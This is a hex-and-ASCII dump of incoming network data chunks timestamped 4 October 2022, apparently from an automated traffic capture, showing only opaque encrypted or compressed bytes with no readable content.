                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13752INData Raw: 2d cf a2 2f 7e 5e 8f f9 0e a1 a5 d2 2b 20 38 9f 5f ea b3 81 55 bd ec 66 84 bb c7 61 05 06 33 a0 c4 a0 0e 6b 2d 6a 34 9b 57 54 15 87 1a 1b c4 23 7d c6 24 13 e6 d2 d1 ca 1f f9 37 7c c1 0e 57 ec a1 8d 43 1a af 92 82 0c f6 03 83 69 1b a2 b5 d5 2e e1 7c 83 28 e0 67 1e bd 2d b4 ab 18 26 bd 9b 5e 6a 0a e9 f1 f1 7e 7a a1 18 04 00 fb 50 46 db 1a 85 07 f7 99 97 41 a7 55 b9 7d 27 7e a8 f8 49 a0 5e 34 5a b5 fe d6 71 21 9d 87 8a d9 19 f7 68 77 1f 0a 63 2c 6b ee 3c c8 71 4c 59 9b b7 b3 d6 cc 0d 38 9d 41 df b9 5e ed ad 5d 14 19 e7 2b 5a 2d f7 14 90 74 f8 29 02 a1 8f 6e 42 c6 c5 d4 ca a0 2e 2d ec 72 2c 3d c3 5e 31 28 2f 02 fb d3 8d 74 6d 10 c9 a5 8a 0b 6f 8b 7c 29 8e 96 05 67 1a ef 67 32 12 3d 4d 34 bf d4 a4 95 a6 eb 3d 23 4e c5 72 71 fa ff 64 f1 2c 94 58 12 54 1c 51 53
                                                                                                                                                                                                                                    Data Ascii: -/~^+ 8_Ufa3k-j4WT#}$7|WCi.|(g-&^j~zPFAU}'~I^4Zq!hwc,k<qLY8A^]+Z-t)nB.-r,=^1(/tmo|)gg2=M4=#Nrqd,XTQS
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13768INData Raw: 96 6b 29 40 6e 02 e5 27 fa 99 8c 5a 7c 94 aa 66 b9 6a 6f a4 84 ef dd 15 8d 73 31 a3 e3 d4 05 5a 01 71 fb 2a ec 85 ce 1e b0 32 fd d7 63 97 cb 16 71 e7 1e 02 31 b6 70 12 ba 99 1c 3f b7 69 0b 80 8c 7c 94 c2 6a 8d e5 a4 40 7d 1b c6 9d 80 27 21 75 a3 56 da 6d 14 e7 f7 3e 28 3a 87 f6 6c 4c d4 7b c1 0a 56 6b bb d8 ee df 06 cb 39 ae cc 61 22 be 9e 4e 97 ce 78 eb d8 7c eb f7 fc af 13 fa f7 b2 d3 61 22 b7 d5 7b c0 b0 c5 37 87 1d f0 36 3b e3 ad fd 8d e5 59 e7 38 48 40 d6 d3 2c f2 bc 1a 22 76 30 c6 60 f2 c0 9f 27 e7 53 21 e7 28 f7 96 d8 4b c8 37 e1 b9 f1 1b 93 48 10 71 1d 74 08 b5 64 bc e3 a8 4d 91 f3 38 54 28 c5 de 04 91 40 9d 32 f5 08 f0 6c 6c 3c 99 6d 07 b4 6e 48 34 67 66 19 e7 96 0c cb c4 50 84 44 c6 e6 c6 20 e7 31 b4 4b 5a f1 55 86 46 14 72 ff ca 1e de e9 b9 92
                                                                                                                                                                                                                                    Data Ascii: k)@n'Z|fjos1Zq*2cq1p?i|j@}'!uVm>(:lL{Vk9a"Nx|a"{76;Y8H@,"v0`'S!(K7HqtdM8T(@2ll<mnH4gfPD 1KZUFr
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13784INData Raw: c2 fd 87 71 7c c3 62 50 45 e5 90 eb 1b 88 da 44 4d 71 65 50 8a c6 f7 f4 d7 37 02 db da cc 97 aa 77 96 af ad 1c 9c b6 f2 17 f5 a4 c6 d0 74 cb 55 99 72 62 2e d1 0f e9 e3 33 c9 33 da 93 7a ed 40 55 c3 b3 2e 1d d2 f1 ba 98 43 42 57 c3 82 a1 13 e5 c6 1a 73 88 6c 33 40 92 a7 04 77 c0 12 60 25 d3 a1 cf 3f 14 44 92 04 d5 f7 43 55 5b e8 00 2f 7f 55 54 a4 a4 9f 0f 26 61 72 86 6f 48 e3 82 71 ca 59 15 3d f6 d7 f9 a8 81 d2 38 a0 4d ee 5e 42 d2 7a 78 21 83 e5 2e 12 ed 1c 7c 7e 70 5b 96 11 37 a6 30 6a b0 ba 9a 80 7a 66 14 13 21 dd f3 05 9e a1 49 2c c4 6c f1 41 f4 9e 7e 63 7d 95 2a 64 73 69 1f 76 ac bc de c2 8b 24 88 63 5d 66 20 ce 59 25 2a 86 16 f9 7d b7 21 06 ab 5c 25 7b 01 c4 95 ba 66 ea 3b 1d 07 d1 27 9d bc 07 18 f3 a4 b7 5a fe 2f a4 2b e1 81 e8 57 4b a0 7e dd 75 0b
                                                                                                                                                                                                                                    Data Ascii: q|bPEDMqeP7wtUrb.33z@U.CBWsl3@w`%?DCU[/UT&aroHqY=8M^Bzx!.|~p[70jzf!I,lA~c}*dsiv$c]f Y%*}!\%{f;'Z/+WK~u
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13800INData Raw: c0 9f 12 a3 07 d3 b4 5a b7 94 0f a0 a5 16 25 97 d4 7e 6e 96 be 5b ec 42 34 00 1a 2b bb 54 0f b6 47 52 96 47 d6 ba 20 27 e5 d3 25 54 42 ca 8c ab bf 51 be fe f2 37 a7 b7 d9 05 ac 33 fc 85 81 fc 49 63 a6 60 00 91 5d 15 03 38 62 10 52 25 ca 6d 4b 10 f5 02 a2 dd 0a 58 31 51 e4 4c 99 fb a2 3b 8f a4 8c 23 f6 d0 fc 8e 12 a4 ce 16 2a b4 42 2a 53 af b9 2d 8f 74 bb 30 80 68 4e 84 4f 57 29 5b c0 ac 9b 95 4c 61 7d e2 36 1a b6 da b4 3c b3 ea 45 1a d0 47 5c 18 3c 2a 7f 82 d8 2b 22 7d fb ea 71 21 3f b2 bc 73 c4 c3 3c 2a 73 ea 64 39 37 88 20 24 4c 16 54 fa 6f 77 c2 de 24 85 3d a0 7b ef ed cf 1b a0 f8 00 b6 ec 11 4c 61 f0 bf d8 1d 92 fd 9a 0d 02 d9 71 ce b4 b0 ef 0d 3d 8b a0 31 ed ec 2d d5 73 68 21 d2 a9 fd 21 2a 71 9c 81 cf ef 0c 9a 82 d7 0f e9 f6 fb 4f b3 13 26 71 0b 1e
                                                                                                                                                                                                                                    Data Ascii: Z%~n[B4+TGRG '%TBQ73Ic`]8bR%mKX1QL;#*B*S-t0hNOW)[La}6<EG\<*+"}q!?s<*sd97 $LTow$={Laq=1-sh!!*qO&q
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13816INData Raw: a1 f6 f4 f2 8b 65 9b 68 62 69 ee 4d 5f 09 2e 75 4d ce b5 4d 86 25 7d 16 a7 f7 ba e9 51 16 80 2d a4 91 29 bd 88 95 47 d7 98 5b 51 a5 be 0b c4 46 81 d7 87 aa 0d ef 45 6b 81 e0 a2 b5 7c 53 00 9e e5 24 52 bc 2e c0 5f af e7 f3 0c ba 5d de 87 b0 26 63 01 ee 95 d0 80 f3 4f 6d e3 3a 05 50 11 0e 60 51 c5 db 17 fa 9a 5d a2 4c bc 1a c3 78 2a 63 25 09 92 db b8 8a ed cb d9 ff 6d dc d4 08 8b 06 1a 28 f5 51 cc a3 c0 5d ea 8c c9 fe 74 3a 28 b3 e2 3f c4 af 00 62 86 aa 02 cc cf 5a 5d e7 23 0f 46 1b 67 f1 35 2c 06 33 59 fc 21 60 e8 56 a7 a2 02 87 20 4a b5 ae b7 8f 84 73 f5 7b 4d 32 50 ee cf cf c8 ce 79 cd 32 98 06 5e f4 80 62 91 20 a0 e9 65 5d d2 55 10 04 32 82 71 8a 0e f4 98 2d 72 d5 53 37 aa 1b 0d da b1 4d a8 5d bd a5 a4 a0 3d f7 86 55 8c 1b 19 3a 8b 2a 2e 9f c0 ba 50 e1
                                                                                                                                                                                                                                    Data Ascii: ehbiM_.uMM%}Q-)G[QFEk|S$R._]&cOm:P`Q]Lx*c%m(Q]t:(?bZ]#Fg5,3Y!`V Js{M2Py2^b e]U2q-rS7M]=U:*.P
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13832INData Raw: a3 cd e0 4b ba 55 1a fe cc 88 e5 a3 59 5e fa 3e 25 40 f1 ad e6 72 e3 05 67 09 86 c2 3d 8a 53 0f 03 ad 40 9b a5 18 31 26 95 9c c1 38 2e e5 85 70 d3 05 e3 b6 cc 5c f5 cb 2b 50 ba 91 7d a4 ed e7 65 19 d8 52 b9 a4 55 00 0f 2f 87 6d 3d e2 12 ec 0d f4 28 87 0e 14 4d 77 5c 24 1f 2d 5f 7e 00 2d d1 d7 ae 98 c8 6d 93 ae db b7 58 e6 8d b9 c1 e8 78 23 d6 7c f2 79 b3 50 ad ab e9 74 f4 ce 45 11 c5 90 ee 74 5b ac 14 3a f2 91 df 5b df f7 a5 53 5b 09 ba 05 9d 75 70 e3 98 c0 d7 56 9d ca 52 38 74 e1 82 0a ef c5 fc 5c 16 ef ac f7 4c 2a cf 69 04 b9 5f 75 ab db 10 e7 be fe ff 12 20 3e 39 b0 cf 9c c6 45 e8 66 4b b9 ac 16 d1 9e 65 87 5c 4c 0b 53 4f 37 c7 8a ef e1 85 b1 6d 3b 45 06 f3 54 08 9b 61 d6 52 78 3d 44 8d 1a 1a d1 d8 56 3a 1b a4 5a 67 5a 09 fe 23 2f d0 6f f6 6a 58 d2 96
                                                                                                                                                                                                                                    Data Ascii: KUY^>%@rg=S@1&8.p\+P}eRU/m=(Mw\$-_~-mXx#|yPtEt[:[S[upVR8t\L*i_u >9EfKe\LSO7m;ETaRx=DV:ZgZ#/ojX
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13848INData Raw: f6 13 97 85 42 ba 67 a4 08 3d c2 dc e4 ae 2f 42 c9 43 c0 70 f9 d8 0f 70 35 f7 5e e9 17 4c d8 50 fe 3c 00 00 df 02 8b 9d 02 5f 96 8a 67 f5 b0 fd 51 3f 5a 37 13 95 c0 64 94 67 d9 c3 ac cb 82 fc bf 0a 58 79 84 da 87 fa 20 64 c8 d3 11 e4 9a 92 a3 4b bf 36 49 15 ff 1a c6 b6 c0 60 19 52 a7 57 3e 59 f5 89 01 bf 50 61 d1 cf e0 f6 00 b7 8b 56 aa 3c be 20 9c 0d 42 0f a9 03 ac 7d 59 85 29 c1 04 f3 d0 22 18 7d 42 e5 91 38 a9 e2 ad ef 41 df 61 ff d7 ef 22 8b 80 06 a4 0d 83 1f cf d8 fa aa 5f a0 4e d2 72 cf 23 f5 e2 79 a1 22 b1 4d 2b 62 fc 59 d4 e2 29 15 52 53 f7 30 b8 49 80 1d 1c a6 dd ff e8 51 a3 40 65 04 04 42 09 e9 dd ee e1 cd 46 50 7a 5f 36 1f dd 0c 1b 48 0d d4 c5 be dc 95 f5 3c f2 af 57 eb 66 b5 33 ff c3 be 1f 96 af d7 b3 62 52 7d b3 d7 cd 7a 57 65 08 c0 f7 8a f0
                                                                                                                                                                                                                                    Data Ascii: Bg=/BCpp5^LP<_gQ?Z7dgXy dK6I`RW>YPaV< B}Y)"}B8Aa"_Nr#y"M+bY)RS0IQ@eBFPz_6H<Wf3bR}zWe
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13864INData Raw: 72 b3 f7 71 e8 47 f9 53 7d f2 d2 14 dc fc 90 cc cd 5e 5b 95 ad 1e 62 15 c4 8a 98 7b 64 59 6c 1e e1 02 de 3d 9c 84 75 2b 97 87 41 53 09 49 4d 2e c6 cf 2a dc eb d1 aa 11 71 9c 2f 1e 9a 5e 80 02 e0 da 10 5e a3 e0 96 00 09 f4 38 e4 1a 44 98 34 eb 45 02 61 80 5b 5a d8 e6 90 e1 9e 2b bb 78 87 68 44 e7 08 72 fe 4c d2 a8 73 5a 50 f9 8c fb e8 ca f7 8a 94 af 6c a0 b5 82 f7 31 e6 5b 69 91 b8 b1 23 81 3a aa cd df 38 4f 09 00 35 a0 67 42 20 3f 16 15 7d 11 ee 30 7a 2f 72 8f 4f 7e 1d 4a 56 4c b4 a9 30 91 27 d0 fd 29 2c ed 7a ff d6 b8 0d 4a 20 3b 6f d5 6d 89 af f2 31 10 bf 7c f3 26 47 9b 4c 84 dd 6b 6f cf 2c 51 c1 19 d7 f7 fa 8f da 59 f8 2a c0 c3 3f c3 6a 96 42 f3 c0 dd 35 07 d5 ca 24 e6 48 77 93 ec dd 17 81 f9 de b7 83 d0 dc af 65 bf 4c 92 ac a1 be 28 36 f1 c7 c7 ff aa
                                                                                                                                                                                                                                    Data Ascii: rqGS}^[b{dYl=u+ASIM.*q/^^8D4Ea[Z+xhDrLsZPl1[i#:8O5gB ?}0z/rO~JVL0'),zJ ;om1|&GLko,QY*?jB5$HweL(6
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13880INData Raw: d9 d0 30 d6 96 46 20 28 d9 e3 82 ba 47 58 cc a2 07 1f 1d ea 6c 07 58 7d 4f 2d d2 03 09 4d bc e9 0f ee fa e1 82 3e ca 49 59 5c 13 f3 00 85 a2 e1 37 82 1d 52 db c5 71 fc 86 e6 c7 fe 74 ed 63 9e 1e 67 2b 89 ea ea ec 14 4c e8 d6 41 ed 01 2a af e8 63 69 78 73 3f e4 e0 3b 4a 11 4e c8 c5 8b 9f ba 53 3a 98 a9 5d 82 64 24 e7 ca cc a5 bc 6a a8 f1 a0 c8 e6 1a bd 95 8c e9 76 ef 3b 51 ec ad 36 5d 71 8a d1 16 06 39 1f 84 ff 6d 34 23 a2 50 c4 6e f7 9e b1 a8 19 ca b1 18 c9 0a 81 a2 92 09 2a 2e 99 ac cf 83 fb 1c 96 31 f1 2d 10 bc fb 16 95 09 31 77 14 5c a7 3d 83 0a 24 fd 3c 07 b3 f8 15 36 2d 84 5d eb fc 36 72 38 da bc d7 10 87 1d 79 2e d2 98 59 1c d3 d4 cd bd a0 cc 98 f0 f3 dc 7b 8a 9c 0c 98 ed 26 be 0a 4c 52 9d e9 c7 4c 6a d4 1f 65 45 ae 15 ec e0 24 c0 0d d1 3f e3 25 58
                                                                                                                                                                                                                                    Data Ascii: 0F (GXlX}O-M>IY\7Rqtcg+LA*cixs?;JNS:]d$jv;Q6]q9m4#Pn*.1-1w\=$<6-]6r8y.Y{&LRLjeE$?%X
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13896INData Raw: c4 f1 ae 73 c0 7f ba 05 94 5a f1 a6 bc a7 3d e9 39 78 70 23 9e 26 b9 bd a1 32 ca f4 85 42 96 0f 19 c9 20 cb 5e 02 38 51 de be 4d 5b 13 af b8 6c c7 b5 4e 7f 86 c7 cc dc 95 27 cc a1 73 b8 eb 2f dc 60 0b 93 b3 31 7e da e8 7d 72 20 28 b4 c9 c6 57 75 60 f5 ac 30 b0 6e 03 e5 b6 f3 bd ee f7 76 ee 0e 1b bb c4 e9 3f 87 21 d5 68 b7 9e 83 6c dc 8c 73 9f 47 64 0e b3 b9 21 bd 7b 1f 60 9d bd 42 0b 40 b4 4c b4 10 cc c8 68 78 87 1e 71 a7 a8 48 be 3f 04 0c e9 82 1e 2a 24 07 09 4a 69 2b 0f e0 73 22 75 83 8d 4e 6a 4c 39 1a 25 38 7e e6 4c 84 fe 9b a4 22 f5 fb 32 28 7c e1 16 88 0c 0b 1a bf 5e 91 33 f4 2e b3 6d db 8a f2 51 29 74 35 0e c7 2a 1a f0 b1 6f a8 19 d6 a7 89 38 47 ee f0 ec b1 05 39 b2 25 92 e7 39 ff ee 2c 61 3b 35 79 a5 75 4b e2 89 93 52 21 d8 6b 60 10 28 d9 7f f4 de
                                                                                                                                                                                                                                    Data Ascii: sZ=9xp#&2B ^8QM[lN's/`1~}r (Wu`0nv?!hlsGd!{`B@LhxqH?*$Ji+s"uNjL9%8~L"2(|^3.mQ)t5*o8G9%9,a;5yuKR!k`(
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13912INData Raw: 7c 7b 0c a2 7d aa 60 02 f4 5a 72 8d 78 24 ed 32 f4 ad 44 7b dc df dc 23 7e 11 06 96 68 98 49 d3 58 ca cb 9a c3 a6 e5 47 40 c7 e3 de ea c2 11 6b 6c d4 92 65 11 21 4d cd 2f ca 8a 48 9d 2e 2a 23 5c d9 f9 67 b1 96 85 59 54 be f2 66 b9 1c d2 45 45 16 2d 43 ca 2b 71 91 22 c2 19 c3 ff 7e 9d d9 8d a3 2f c4 e6 a2 ca a6 2c 87 e8 1b d2 38 94 7b 4a 5f 15 14 0c 30 70 f8 48 f9 0e 0f 5e 81 64 71 71 54 75 1f 38 a7 76 1f e8 5b d3 77 5d f8 ba d9 19 e7 50 8d ff 26 00 7b 13 b1 bb 56 9f 67 e5 c2 1f 66 1e d6 66 53 4e 03 be 86 c7 03 8a 6e 3d fe 18 8e aa 00 4a 1f a1 5e a3 cd e7 3d 8a 34 c1 ff 6b c0 43 d0 bd 11 dd 55 07 cb c3 3a 94 53 a1 cc c7 7c 54 07 e9 2a 6d e9 83 da 4d d4 b3 8d 59 1e 93 92 b3 f9 90 ee 61 ab 41 42 0e bb ef 92 95 10 5f f2 af de 15 ac e5 a2 ba 34 1b d3 0e b1 80
                                                                                                                                                                                                                                    Data Ascii: |{}`Zrx$2D{#~hIXG@kle!M/H.*#\gYTfEE-C+q"~/,8{J_0pH^dqqTu8v[w]P&{VgffSNn=J^=4kCU:S|T*mMYaAB_4
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13928INData Raw: 2c fb 75 38 97 bd 01 12 5a 1f c1 f4 8f 7f e9 95 c4 6e 10 f8 c1 8f e2 3d a6 e4 e2 05 76 59 4d 94 ea 1e 70 01 97 ba 1d 8d 36 54 37 33 a9 4f 29 8c 1e d5 15 62 86 54 3d 95 76 a0 15 2f f0 65 12 4c 4d 75 56 b2 a2 11 14 07 1f 15 57 3e a4 e0 3a 01 7d 09 2c 89 d1 95 b3 ea e6 91 4c 46 44 a6 98 60 c8 05 f2 9d 53 7d ac d5 a2 76 72 00 44 26 13 f3 9f a9 55 60 06 81 9d f7 6f 10 16 e0 b8 e3 eb cb 4e ff d8 16 12 a2 79 21 10 f0 7f 1f 61 ac bf 41 05 cf fc 7e f5 74 ca 33 95 9f 76 d7 d8 ff 3b d2 2c 49 22 11 07 2f 2f a7 31 26 2b db 2f 18 68 cb a8 b4 77 04 6c 9f e7 e8 a6 6b a9 9c 08 48 ed ce 5c 2f 94 dc 79 5b 15 89 83 59 c7 17 f3 76 7d 01 f9 7f 54 02 46 6c 44 bb 03 dd b7 55 eb ad 39 c6 bd 44 92 a9 a9 98 fa fb 37 df 0b 91 cc 4e 48 a5 12 1f a7 f5 8a cd b6 93 7d 61 d7 7b 9c 56 66
                                                                                                                                                                                                                                    Data Ascii: ,u8Zn=vYMp6T73O)bT=v/eLMuVW>:},LFD`S}vrD&U`oNy!aA~t3v;,I"//1&+/hwlkH\/y[Yv}TFlDU9D7NH}a{Vf
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13944INData Raw: c6 4e 91 32 94 18 79 b5 ce 4e 34 66 e7 53 69 f1 08 20 39 12 2e fd 3f fc 47 ae b1 78 ae fa cc c4 49 28 97 69 62 3a 02 85 fa 19 90 26 f2 01 0b 18 bd 6e c3 7d 00 09 58 05 39 15 c4 12 50 82 90 b4 f7 70 dc 42 62 3e f0 c8 7b 37 c7 f6 91 4c d7 15 bd ad 0a 80 b6 2e 1c 39 8d b9 b5 39 f3 b7 fd f6 26 38 13 90 75 cc a7 b4 d4 78 50 85 29 73 f5 9e 03 5e f7 8d a8 d3 b3 a4 d7 91 f4 9f 64 a4 3c bf 20 b6 11 31 9b 73 39 6b 29 05 b0 35 06 b4 ec be dd 81 f6 dd d1 f7 61 97 52 ae 84 e9 f5 04 01 9d e7 ce a4 be 3d 53 d2 09 6f 7a 43 13 c6 c4 da 96 f0 f7 15 72 d0 7b 04 59 ea f4 3e 6b 9f fe e1 87 15 ed 52 df f3 92 22 3c 16 d3 21 65 0d c8 92 74 d7 1a ac f8 8b ca 59 7c 32 65 ac 20 d6 20 64 a6 ca 69 07 51 21 54 15 18 ad 5f 63 78 c2 34 f4 34 6a 26 b9 26 22 98 40 f9 ee 47 05 a2 70 42 56
                                                                                                                                                                                                                                    Data Ascii: N2yN4fSi 9.?GxI(ib:&n}X9PpBb>{7L.99&8uxP)s^d< 1s9k)5aR=SozCr{Y>kR"<!etY|2e diQ!T_cx44j&&"@GpBV
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13960INData Raw: 09 ec 8a fd af 85 dd e1 a7 75 da 5a 45 aa 86 fe f7 31 a1 ef 75 08 89 72 56 80 ac 76 b2 5c 0e 49 30 65 38 e2 7d 4b a7 b4 91 9e 1d c8 ed 0c fa 02 6e 14 85 c7 1d bf d8 df 26 fc 5d 2c f0 ae ca e5 76 f6 89 9a 81 64 36 d4 3c 69 c5 e4 16 fa a6 ba a2 f2 f6 33 79 b2 85 eb 20 19 9b ee 0f 2e b6 71 e7 97 0e 93 7f d1 b6 9e f8 37 ac d1 7d e8 5e 46 e7 a2 f2 c1 f5 39 a3 67 19 7e 62 a0 40 ec 9a b4 ec c3 38 07 c6 d4 54 72 0f 21 8f db 33 d9 11 71 c0 92 f9 ed 1f 70 6f a9 6a 11 cf 13 3c c1 21 dc 5c 71 6c a7 20 ac e4 04 f9 ae 4d 9b 9b 51 7c 9d 8a 38 98 47 d0 2c 90 90 09 b8 08 09 6e 12 10 c8 85 c5 ed 40 e9 fc e2 d0 b9 ff cd 7c 89 b0 20 04 ea 35 bf 2c b7 95 76 c9 ca 62 70 25 68 25 b3 70 d1 8f 62 15 81 f0 a2 3f 3d e7 cf ea 88 d2 27 e2 4d 8b 70 68 e0 45 9d 82 16 fa ce aa 8a 4f 4f
                                                                                                                                                                                                                                    Data Ascii: uZE1urVv\I0e8}Kn&],vd6<i3y .q7}^F9g~b@8Tr!3qpoj<!\ql MQ|8G,n@| 5,vbp%h%pb?='MphEOO
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13976INData Raw: ba 0e f2 17 d2 5d 33 52 31 69 e4 c5 d1 50 4b ee c8 c6 b6 e5 d8 51 8f 69 dd 60 4d 86 90 cd c3 ca c4 ad 03 9a cd f6 82 51 dc 38 e8 bf 71 0b 07 66 23 3c e9 db 60 0a 5b 08 59 68 f1 e0 8c 02 91 cd fc 4a 3c 71 27 97 fd 99 c5 c6 53 d5 a6 dc 51 2d 0f 0e c0 a6 92 4e b3 f4 b6 35 3b c7 d7 07 4e d4 b4 86 d0 18 ec 71 a6 f9 82 9c 92 2a 6c 97 25 7c 80 e1 ac 20 97 f1 4d f4 32 d1 68 8f 45 3f 08 67 5e ae 6c 01 c7 b3 37 14 f9 c6 54 e8 af 5e a6 1f 91 a7 66 dd 9c ac 67 3a cb 0e 4b 76 d2 e6 e3 7b 89 1b 37 26 50 f2 a2 24 44 48 07 39 67 cb ae 3b 63 1d 23 2d 57 58 f4 cd c5 98 59 ea bc 8f 79 39 65 e2 d4 4f e6 8c 98 b0 18 a7 b5 0a b0 9c a2 5c f3 e3 15 d4 cf d0 e5 cc 69 df a9 d2 9e ea 34 f2 5a ec 25 a3 e2 45 84 04 1d d9 b4 90 1c 4d 10 c3 ef 70 e1 c7 3c 43 8c 7f f8 6e 15 10 d2 bc 7b
                                                                                                                                                                                                                                    Data Ascii: ]3R1iPKQi`MQ8qf#<`[YhJ<q'SQ-N5;Nq*l%| M2hE?g^l7T^fg:Kv{7&P$DH9g;c#-WXYy9eO\i4Z%EMp<Cn{
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13992INData Raw: 3f b2 c3 de 94 20 c2 6f 6c d4 81 d2 48 b5 92 8c 9f ca b2 28 aa 7a c6 6b 12 9f 05 dd 56 f0 ed 76 37 1d dc 5c 8b 0d f8 31 0f aa 93 c8 60 09 b0 c7 b0 4f e9 56 c2 86 24 05 ed 99 f3 e7 94 12 8d ea c5 77 8b 35 a1 6f 84 cd 08 68 4d 3f 73 15 f4 ae 8e 30 8f bc f8 4e 6f af f0 48 2e 4c 6c 43 04 10 a1 79 83 b4 5d 56 c3 5f 08 90 66 82 8c 58 96 ae db d9 57 03 24 1c c4 60 a6 9c 7f ff 4a 52 cd 2f 07 fb 53 bf 74 91 ad 14 aa e3 75 78 08 55 56 59 dc be 95 d1 1e 87 c9 f7 0c b9 c9 5b 20 52 df a8 17 4c 9e d1 34 48 0a 7d 9c 91 83 37 5e 68 82 37 02 02 19 2e 28 61 39 48 71 ec 4d 37 71 62 9b eb c2 3f 0d 04 95 95 c4 c0 1c 3c 75 eb 3b 50 96 da 14 11 2e ad d0 af dd 91 03 9d bf c0 28 5b f5 c4 8b 0a 9c 71 c0 cc 22 1f 9a 0e de 27 0f 16 af 63 d5 49 49 76 05 79 d2 da 56 98 6a 89 e9 bc 20
                                                                                                                                                                                                                                    Data Ascii: ? olH(zkVv7\1`OV$w5ohM?s0NoH.LlCy]V_fXW$`JR/StuxUVY[ RL4H}7^h7.(a9HqM7qb?<u;P.([q"'cIIvyVj
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14008INData Raw: 8c 3f 25 0d b5 93 e0 cb c7 5f 0a 13 46 98 9c 30 57 69 b6 83 bf 13 d1 29 91 5b 79 38 90 72 41 ce 5a 21 5a 96 c6 98 0b 6c ef 4e 8f 2b bb fd a7 69 be 10 fa 06 3e ff dd 1b d1 72 e6 c9 bd 24 e2 40 6f c2 cb 4f b7 58 b0 27 83 28 a5 d7 f9 9a bc 1b 16 c9 bb 95 d4 49 4f 5a f9 08 1b 7e 9f 93 7a ad 3c 33 20 61 d9 57 9a 37 20 ef 66 db 64 9a 3e 1a a1 82 10 23 66 a2 65 79 ed 71 9c 3c f9 52 c8 20 34 1f 56 e1 1d ee 59 50 5b 51 74 f0 16 e3 a0 01 43 d8 d6 55 f6 8b dc cd a8 b6 18 41 1b af ae 21 29 ea 78 f0 da 09 11 eb 31 47 77 37 9b df 31 e4 1b 88 f5 88 11 6a e3 5f eb c9 fd 28 11 47 57 a1 28 db 9b 60 12 51 9f ea 09 95 a8 da 46 90 c0 00 83 8c 72 23 4f a0 ff 52 86 63 5e 47 48 77 3a 2c 21 80 3a f6 6a 36 9f 0a d7 63 14 21 7a 58 bc 47 72 f0 ba 62 58 51 9e 09 cd a0 ba 79 ea e3 66
                                                                                                                                                                                                                                    Data Ascii: ?%_F0Wi)[y8rAZ!ZlN+i>r$@oOX'(IOZ~z<3 aW7 fd>#feyq<R 4VYP[QtCUA!)x1Gw71j_(GW(`QFr#ORc^GHw:,!:j6c!zXGrbXQyf
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14024INData Raw: 94 b3 80 a2 f7 d0 8c 8b a7 fc 17 29 b0 54 a6 d6 51 5f 43 dd 9d 40 12 e5 eb 66 66 5d 5a fb a0 b2 7a dd 67 01 a9 bc 5a ab b5 df ea 10 4c 19 f9 78 4e d4 7e 84 01 9a af 37 ef 45 d5 10 73 38 93 aa 0e 50 80 cc 49 bd 38 d6 5e 2d 15 59 a6 35 6a 40 9e d2 00 f3 3f 0d 4d 32 3e 3f e5 1e 55 ed 05 b4 6e 88 8c 74 fd fe e7 be 2c ec 2f f7 25 bf 84 be 5f cd c7 a4 bc bc 6a cd be c3 70 7c 2c a0 75 33 e5 9d c8 9c 3b c3 5f a5 2c 83 0f 9f 4a c5 aa 84 43 82 70 c5 30 41 1f db 81 31 af 85 d6 17 90 8d 26 5e 01 10 db 7f 5e 45 59 83 3a 7d 34 10 7f 7c a1 ee e4 a2 26 7e 80 c3 2a 3a 58 22 16 ad a3 50 fb 28 36 5d 06 05 7b ad 41 b4 cf 06 ce ca e0 46 17 43 7f 6c a8 d2 6d ba 2f ff 0e 82 af a2 e6 25 25 f2 a0 2c f4 d6 7c 77 57 a8 99 58 c6 0d 79 cb 0d 22 79 dc 62 bb 46 01 8c a3 a8 22 56 2f 00
                                                                                                                                                                                                                                    Data Ascii: )TQ_C@ff]ZzgZLxN~7Es8PI8^-Y5j@?M2>?Unt,/%_jp|,u3;_,JCp0A1&^^EY:}4|&~*:X"P(6]{AFClm/%%,|wWXy"ybF"V/
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14040INData Raw: ce 20 d9 ef 3d a2 ed f5 86 f1 46 5d 9d 30 52 d0 25 ac 5a 0e 30 41 b2 e3 20 44 cd b5 4a 33 e1 8d de a4 6e b8 82 3d 57 b4 e1 64 08 69 ce bc 63 1c da 25 8f c2 03 82 71 a7 df ec 32 a2 0e f7 95 4d 53 77 30 06 5f ae 93 87 5c 59 8a e2 e8 7c de 59 b1 b2 78 13 84 58 f0 26 1a e7 c0 26 24 b3 85 7b de 1e eb b8 b5 49 0f 97 0b e8 27 d0 f4 1f cb 57 70 d3 10 ea 32 a0 f8 58 c5 f6 24 58 aa 16 94 a3 b8 30 f6 73 28 f2 eb 31 74 1e f6 89 8d 3c ea 83 a5 76 e7 13 ad b8 f0 5b 6b 90 18 54 a1 b2 38 56 fc 75 9f 44 8e 2d 71 ab fe 6a 9e ef 88 d4 d2 af 4e 87 b4 16 19 f6 49 09 92 13 5e 9c e0 9d 67 9c 71 aa c8 ea 75 93 4c 7f 8f b0 86 c9 9f 25 d9 e1 a4 73 a6 6a 3d 1a e2 46 1e 2d db cb 7a 7d c2 a2 c9 ce 0d c6 a6 25 e7 a6 9c 81 38 a1 2c e3 87 7e 25 1a 23 da 55 b1 7d 2c a7 43 38 76 93 56 f7
                                                                                                                                                                                                                                    Data Ascii: =F]0R%Z0A DJ3n=Wdic%q2MSw0_\Y|YxX&&${I'Wp2X$X0s(1t<v[kT8VuD-qjNI^gquL%sj=F-z}%8,~%#U},C8vV
